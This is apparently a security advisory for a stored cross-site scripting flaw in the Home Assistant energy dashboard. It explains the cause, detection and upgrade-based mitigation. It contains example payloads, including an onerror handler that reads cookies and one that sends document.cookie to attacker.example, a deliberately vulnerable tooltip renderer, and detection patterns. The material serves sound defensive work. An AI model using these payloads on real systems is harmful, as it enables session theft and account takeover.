CVE-2025-62172 Overview
Home Assistant, an open source home automation platform, contains a stored cross-site scripting (XSS) vulnerability in its energy dashboard. The flaw affects versions 2025.1.0 through 2025.10.1 and is classified as CWE-79. An authenticated user can inject JavaScript through an energy entity's name field; the payload runs in the browser of any user who hovers over data points in the energy dashboard graph, because the tooltip renders the entity name as HTML without escaping it. Maintainers patched the issue in version 2025.10.2.
Critical Impact
Authenticated attackers can execute arbitrary JavaScript in other users' browser sessions. Because the name is stored and rendered for every viewer, a malicious energy provider integration that supplies a tainted default entity name can plant the same payload during normal integration setup, without the attacker holding an account on the target instance; the victim's hover over the graph is still required to trigger it.
Affected Products
- Home Assistant Core version 2025.1.0 through 2025.10.1
- Home Assistant deployments integrating energy provider entities (for example, Tibber)
- Home Assistant energy dashboard component
Discovery Timeline
- 2025-10-14 - CVE-2025-62172 published to NVD
- 2026-04-15 - Last updated in NVD database
Technical Details for CVE-2025-62172
Vulnerability Analysis
The vulnerability is a stored cross-site scripting flaw in the Home Assistant energy dashboard. Entity names are free-form strings, which is expected and not itself the defect; the problem is that the dashboard's graph tooltip inserts the name into the DOM as markup rather than as text. Hovering over a data point renders the tooltip, so any tag or event handler attribute embedded in the name becomes live DOM and executes in the victim's session context.
Exploitation requires authentication to create or rename an energy entity. However, the impact extends beyond authenticated attackers. If an upstream energy provider integration supplies a malicious default entity name, the payload is stored automatically during normal integration setup. In that scenario, no direct attacker interaction with the target instance is required before victims trigger execution.
Successful exploitation lets the attacker run arbitrary JavaScript with the privileges of the viewing user. This includes administrators, enabling theft of session tokens, modification of automations, exfiltration of sensor data, and pivoting to other integrations exposed through the Home Assistant API.
Root Cause
The energy dashboard tooltip renderer treats the entity name attribute as trusted markup rather than as plain text. No HTML escaping or sanitization layer is applied before the string is inserted into the tooltip element, so tags and event handler attributes in the name are parsed as real elements. One practical caveat: markup inserted through innerHTML-style APIs does not execute inline <script> elements, so the payloads that actually fire are event handler attributes on injected elements (for example an onerror handler on an <img> with an unreachable source), which run as soon as the tooltip renders.
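As an added illustration (example code written for this page, not Home Assistant frontend code), the following contrasts a tooltip renderer that interpolates the entity name into markup with one that escapes it first. The function names, the tooltip layout and the test payload are assumptions for illustration; the Home Assistant frontend's actual templates are not reproduced here.

```javascript
// Added example (not Home Assistant frontend code): how a tooltip renderer that
// treats the entity name as markup differs from one that treats it as text.
// Function names, tooltip layout and the payload below are assumptions.

// Minimal HTML escaper covering the characters that matter in element content
// and in double-quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable shape: the entity name is interpolated into an HTML string that is
// later assigned to element.innerHTML (or passed to a template helper that does
// not escape). A name such as <img src=x onerror=alert(1)> becomes a live
// element whose onerror handler fires when the tooltip is shown. Note that an
// inline <script> element inserted this way would NOT run; event handler
// attributes are the working vector.
function renderTooltipVulnerable(entityName, kwh) {
  return `<div class="tooltip"><b>${entityName}</b>: ${kwh} kWh</div>`;
}

// Hardened shape: the name is escaped before interpolation, so the same payload
// is displayed literally and creates no element.
function renderTooltipSafe(entityName, kwh) {
  return `<div class="tooltip"><b>${escapeHtml(entityName)}</b>: ${Number(kwh)} kWh</div>`;
}

// Equivalent DOM-API approach when a real document is available: build the
// nodes and assign the untrusted string with textContent, which never parses
// markup. Not exercised here because this sample runs under Node without a DOM.
function renderTooltipDom(doc, entityName, kwh) {
  const div = doc.createElement('div');
  div.className = 'tooltip';
  const b = doc.createElement('b');
  b.textContent = entityName;          // text, never markup
  div.append(b, `: ${Number(kwh)} kWh`);
  return div;
}

// Constructed payload in the style the advisory describes (an onerror handler).
const samplePayload = '<img src=x onerror="alert(document.cookie)">';
console.log('vulnerable:', renderTooltipVulnerable(samplePayload, 3.2));
console.log('safe:      ', renderTooltipSafe(samplePayload, 3.2));
```

The string-building variant is shown because it is the easiest to test offline; in a real component the fix is the same either way: escape before interpolating, or use textContent/createTextNode so the string is never parsed.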
Attack Vector
The attack vector is network-based and requires low privileges plus user interaction (a tooltip hover). An authenticated user with permission to add or rename an energy entity sets the entity name to an HTML payload. Any other user viewing the energy dashboard and hovering over the affected data series triggers script execution. When a third-party integration controls the default entity name, the payload is delivered without any in-instance attacker action.
No public proof-of-concept code is referenced in the advisory. See the GitHub Security Advisory GHSA-mq77-rv97-285m for vendor-provided technical detail.
Detection Methods for CVE-2025-62172
Indicators of Compromise
- Energy entity friendly_name or name fields containing HTML tags, <script> blocks, or DOM event handlers such as onerror, onload, or onmouseover.
- Outbound HTTP requests from browser sessions of Home Assistant users to unfamiliar domains shortly after viewing the energy dashboard.
- Unexpected modifications to automations, users, or long-lived access tokens following dashboard usage by privileged accounts.
Detection Strategies
- Audit the Home Assistant entity registry (.storage/core.entity_registry under the configuration directory) for name and original_name values containing angle brackets, quote characters, on...= event handler attribute names, or javascript: URIs. Quote characters alone are weak evidence (apostrophes in names are common); tags and handler attributes are not.
- Review logs and discovered entities from third-party energy integrations to identify default entity names that include markup or scripting syntax.
- Where a Content Security Policy with reporting is enforced in front of Home Assistant (for example by a reverse proxy), inspect CSP violation reports originating from the frontend host; without such a policy there are no reports to collect.
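An added example, not part of Home Assistant, of the entity registry audit described above: a Node script that walks the entity list of a core.entity_registry document and flags name and original_name values containing markup or script-like syntax. The registry object below is constructed for the example (the entity ids, platforms and payload are made up); a real file is found at .storage/core.entity_registry under the configuration directory and has the same data.entities layout, which is the only structural assumption the scanner makes.

```javascript
// Added example, not Home Assistant code: audit an entity registry document for
// entity names that carry markup or script-like syntax.
// Structural assumption: the document has the shape of .storage/core.entity_registry,
// i.e. { "data": { "entities": [ { entity_id, platform, name, original_name, ... } ] } }.

// Patterns that indicate active content (high severity) versus characters that
// merely deserve a look (low severity; the apostrophe in "Kid's room" is legitimate).
const HIGH_PATTERNS = [
  { reason: 'html tag', re: /<\s*\/?\s*[a-z][^>]*>/i },
  { reason: 'event handler attribute', re: /\bon[a-z]+\s*=/i },
  { reason: 'javascript: URI', re: /javascript\s*:/i },
];
const LOW_PATTERNS = [
  { reason: 'script-like identifier', re: /\b(alert|eval|fetch|document\.cookie|localStorage)\b/i },
  { reason: 'angle bracket or quote character', re: /[<>"']/ },
];

// Inspect one string field; returns null when nothing matched.
function inspectName(value) {
  if (typeof value !== 'string') return null;
  const reasons = [];
  let severity = null;
  for (const { reason, re } of HIGH_PATTERNS) {
    if (re.test(value)) { reasons.push(reason); severity = 'high'; }
  }
  for (const { reason, re } of LOW_PATTERNS) {
    if (re.test(value)) { reasons.push(reason); severity = severity || 'low'; }
  }
  return reasons.length ? { severity, reasons } : null;
}

// Walk every entity and both the user-set name and the integration-supplied
// original_name. Returns one finding per (entity, field), most severe first.
function scanRegistry(registry) {
  const entities = (registry && registry.data && Array.isArray(registry.data.entities))
    ? registry.data.entities : [];
  const findings = [];
  for (const ent of entities) {
    for (const field of ['name', 'original_name']) {
      const hit = inspectName(ent[field]);
      if (hit) {
        findings.push({ entity_id: ent.entity_id, platform: ent.platform, field, value: ent[field], ...hit });
      }
    }
  }
  return findings.sort((a, b) => (a.severity === b.severity ? 0 : a.severity === 'high' ? -1 : 1));
}

// Constructed sample registry: ids, platforms and the payload are invented for this example.
const SAMPLE_REGISTRY = {
  version: 1,
  key: 'core.entity_registry',
  data: {
    entities: [
      { entity_id: 'sensor.grid_import_energy', platform: 'tibber', name: null, original_name: 'Grid import energy' },
      { entity_id: 'sensor.kids_room_plug', platform: 'shelly', name: "Kid's room plug", original_name: 'Plug' },
      { entity_id: 'sensor.solar_production', platform: 'mqtt',
        name: '<img src=x onerror="fetch(\'https://attacker.example/?d=\'+encodeURIComponent(document.cookie))">',
        original_name: 'Solar production' },
    ],
  },
};

for (const f of scanRegistry(SAMPLE_REGISTRY)) {
  console.log(`[${f.severity}] ${f.entity_id} (${f.platform}) ${f.field}: ${f.reasons.join(', ')}`);
}
```

To run it against a live instance, read the registry file with fs, JSON.parse it and pass the object to scanRegistry; treat every high-severity row as an indicator to investigate and low-severity rows as candidates to eyeball. Stop Home Assistant or work on a copy before editing the file by hand, since the core writes it back on changes.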
Monitoring Recommendations
- Enable and forward Home Assistant access logs and integration configuration changes to a centralized log store for review.
- Monitor the .storage/core.entity_registry file in the Home Assistant configuration directory for unexpected modifications to entity name fields.
- Track Home Assistant version inventory across deployments to identify hosts still running versions between 2025.1.0 and 2025.10.1.
How to Mitigate CVE-2025-62172
Immediate Actions Required
- Upgrade Home Assistant Core to version 2025.10.2 or later on all instances.
- Review every energy entity in the entity registry and remove or rename any entity whose name contains HTML or script syntax.
- If privileged accounts viewed the energy dashboard while a suspicious entity name was present, treat their sessions as compromised: rotate long-lived access tokens, revoke the refresh tokens listed on each affected user's profile page, and reset passwords.
Patch Information
The maintainers fixed this vulnerability in Home Assistant Core version 2025.10.2. The patch sanitizes entity name content before injection into graph tooltips. Refer to the GitHub Security Advisory GHSA-mq77-rv97-285m for the official release notes and commit references.
Workarounds
- No vendor-supplied workarounds exist for this vulnerability. Upgrading to 2025.10.2 is the only supported remediation.
- As a temporary risk reduction, keep the set of accounts able to rename entities or configure the energy dashboard as small as possible. Home Assistant's permission model is coarse (administrator versus non-administrator), so in practice this means limiting administrator accounts to trusted people and not sharing their credentials.
- Disable or remove energy integrations whose providers cannot be trusted to supply safe default entity names until the upgrade is applied.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

